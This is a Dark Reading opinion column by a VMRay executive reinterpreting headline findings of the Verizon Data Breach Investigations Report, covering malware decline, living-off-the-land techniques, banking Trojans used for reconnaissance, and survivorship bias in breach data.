Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Threat Intelligence

10:00 AM
Chad Loeven
Chad Loeven
Connect Directly
E-Mail vvv

Decoding the Verizon DBIR Report: An Insider's Look Beyond the Headlines

To truly understand cybersecurity trends, we must look beyond the headlines and ask more of the data. What you learn might surprise you.

For the past 13 years, Verizon's "Data Breach Investigations Report" (DBIR) has been the industry's definitive resource for documenting and benchmarking the global state of cybersecurity. As always, the Verizon DBIR team does an admirable job of sifting through an impressively large data set to tease out the underlying trends that are driving the market.

But as Miles Davis, the legendary jazz trumpeter, once famously said, "It's not the notes you play, it's the notes you don't play." In other words, it's the silence between the notes that enables the listener to interpret and appreciate the music's deeper meaning and context. When reading a broad industry survey such as the DBIR, it is likewise instructive to look beyond the bolded headlines and ask further questions of the data to best understand the meaning behind these trends.

Here's what I mean.

Headline #1: The Global Malware Threat Is Evaporating
According to DBIR: The Verizon DBIR team documents a precipitous decline of malware-related threats, from 50% in 2016 to just 6%, stating that "we think that other attack types such as hacking and social breaches benefit from the theft of credentials, which makes it no longer necessary to add malware in order to maintain persistence. So while we definitely cannot assert that malware has gone the way of the eight-track tape, it is a tool that sits idle in the attacker's toolbox in simpler attack scenarios."

Beyond the headline: Of course, it's heartening to read that malware threats are waning, and I agree with the interpretation that the broad availability of user credentials has, to a great extent, obviated the need for threat actors to employ malware to maintain persistence. Why bother climbing through a small basement window if you can just open the front door, right?

However, despite this downward trend, few threat researchers I know would take comfort in this pronouncement alone — nor would they presume that malware is a threat they no longer need worry about. Rather, the decline could be attributed to the fact that exploit kits that were once the province of a sophisticated few threat actors are now broadly available to a larger population via easy-to-use subscription services that don't require the use of advanced malware to compromise the network (not to mention the industry as a whole has collectively improved its ability to detect and block malware threats in general).

Another force behind the decline is that threat actors are relying less on malware as a blunt instrument to gain entry and rather leveraging legitimate system utilities and tools for malicious purposes. This is perhaps best exemplified with the rise of "living-off-the-land binaries" (LOLBins). Typically, threat actors will abuse legitimate apps like PowerShell with malicious scripts to avoid detection by conventional antivirus tools.

Headline #2: It's Still All About the Benjamins, but ...
According to DBIR: Financial rewards remain the primary motivator for threat actors. However, DBIR authors acknowledged a "secondary" motivating factor, for which the compromised infrastructure "is not the main target, but a means to an end as part of another attack."

Beyond the headline: What the authors call secondary is a convenient way to group a wide spectrum of disparate motivations under a single umbrella. However, it also hints at another underlying trend, which is that threat actors are being both more selective at deploying malware and increasingly using evasive malware strains to conduct longer-term intelligence-gathering operations.

With respect to droppers and Trojans, the authors note that while they find these particular threats decreasing over time, "their backdoor and remote-control capabilities are still a key functionality for more advanced attackers to operate and achieve their objective." We've seen ample evidence of this in our work at VMRay analyzing a variety of banking Trojans (for example, Trickbot and Ursnif). We have seen firsthand how they are increasingly being leveraged to conduct a wide range of secondary information reconnaissance — from querying the network for configuration settings, to recording what software and services are installed and running, to breaching HR and payroll systems — all of which attackers can leverage for future attacks.

This supports the case that more sophisticated attackers — be they nation-states or criminal organizations — are leveraging known malware strains and repurposing them for extended campaigns whose primary objective is to maintain persistence.

Headline #3: Reverse Survivorship Bias (aka, It's What We Aren't Seeing That Could Really Be Hurting Us)
According to DBIR: "Our incident corpus suffers from the opposite of survivorship bias. Breaches and incidents are records of when the victim didn't survive. … Malware being blocked by your protective controls is an example of survivorship bias where the potential victim didn't get the malware" … and that "it is important to acknowledge that the relative percentage of malware that we see present in breaches and incidents may not correspond to your experiences fighting, cleaning and quarantining malware throughout your own organization."

Beyond the headline: Perhaps the most well-known example of survivorship bias comes from statistician Abraham Wald, who during World War II took this bias into account when considering how to minimize bomber loss to enemy fire. He observed that it was the planes that never came home — rather than the ones that did despite being riddled with bullet holes, especially in their wings — that should inform the decision as to where bombers should be reinforced with additional armor (the fuselage area).

It's good to see the DBIR authors both acknowledge and highlight this particular issue because even the most comprehensive datasets tell only part of the story. In addition to their observation of malware being blocked by protective controls being an example of survivorship bias where the potential victim didn't get the malware, the open question remains as to how many malware threats never made it into the sample population not because they were blocked, but rather because they succeeded in evading detection. It stands to reason that the malware of 2019 is significantly better at hiding its tracks than the malware of 2014.

The Verizon DBIR has become a truly invaluable resource for threat researchers and security analysts who are continuously tasked with planning for every variety of "what-if" scenario. More than anything, though, the report is a showcase of cross-industry collaboration at its finest, with growing participation from an array of diverse security vendors, government agencies, and nonprofit organizations. Regardless of what the data says about the state of the current threat environment, this type of open cooperation among even the fiercest competitors represents our best hope in keeping our future secure.

(Note: VMRay is among the report's contributing organizations.)

Related Content:



Register now for this year's fully virtual Black Hat USA, scheduled to take place August 1–6. Click for details on conference information and to register.


Chad Loeven has been involved in enterprise security for over 20 years. Prior to VMRay he managed technology alliances at RSA, the security division of EMC. He came on board RSA via its acquisition of Silicium Security and Silicium's ECAT ETDR (Endpoint Threat Detection and ... View Full Bio

Recommended Reading:

Comment  | 
Print  | 
More Insights
Newest First  |  Oldest First  |  Threaded View
7 Old IT Things Every New InfoSec Pro Should Know
Joan Goodchild, Staff Editor,  4/20/2021
Cloud-Native Businesses Struggle With Security
Robert Lemos, Contributing Writer,  5/6/2021
Defending Against Web Scraping Attacks
Rob Simon, Principal Security Consultant at TrustedSec,  5/7/2021
Register for Dark Reading Newsletters
White Papers
Cartoon Contest
Write a Caption, Win an Amazon Gift Card! Click Here
Latest Comment: Take me to your BISO 
Current Issue
2021 Top Enterprise IT Trends
We've identified the key trends that are poised to impact the IT landscape in 2021. Find out why they're important and how they will affect you today!
Flash Poll
How Enterprises are Developing Secure Applications
How Enterprises are Developing Secure Applications
Recent breaches of third-party apps are driving many organizations to think harder about the security of their off-the-shelf software as they continue to move left in secure software development practices.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
PUBLISHED: 2021-05-10
IBM Cloud Pak for Security (CP4S) and could allow a user to obtain sensitive information or perform actions they should not have access to due to incorrect authorization mechanisms. IBM X-Force ID: 198919.
PUBLISHED: 2021-05-10
IBM Control Desk and is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 199228.
PUBLISHED: 2021-05-10
IBM Cloud Pak for Security (CP4S) and is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force I...
PUBLISHED: 2021-05-10
Ticketer is a command based ticket system cog (plugin) for the red discord bot. A vulnerability allowing discord users to expose sensitive information has been found in the Ticketer cog. Please upgrade to version 1.0.1 as soon as possible. As a workaround users may unload the ticketer cog to disable...
PUBLISHED: 2021-05-10
An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.